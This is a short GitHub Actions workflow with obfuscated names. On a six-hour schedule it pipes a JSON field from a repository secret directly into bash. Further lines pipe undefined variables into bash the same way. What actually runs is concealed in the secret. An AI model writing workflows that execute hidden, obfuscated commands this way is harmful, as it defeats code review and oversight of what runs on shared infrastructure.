name: fenzhizoutai

on:
  workflow_dispatch:
  schedule:
    - cron: '19 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fenzhizoutai
        env:
          qzput657: ${{ secrets.qzput657 }}
        run: |
          echo $qzput657 | jq -r .qxc6 | /bin/bash
          echo $oap80 | jq -r .axut0 | /bin/bash
          echo $c35202 | jq -r .yfmdi6 | /bin/bash
          echo $mfua59 | jq -r .hmn2 | /bin/bash
          echo $tktjx7222 | jq -r .wkuzo9990 | /bin/bash
          echo $eq95988 | jq -r .rc8 | /bin/bash
          echo $q9089 | jq -r .rs387 | /bin/bash
          echo $pim4293 | jq -r .usd1334 | /bin/bash

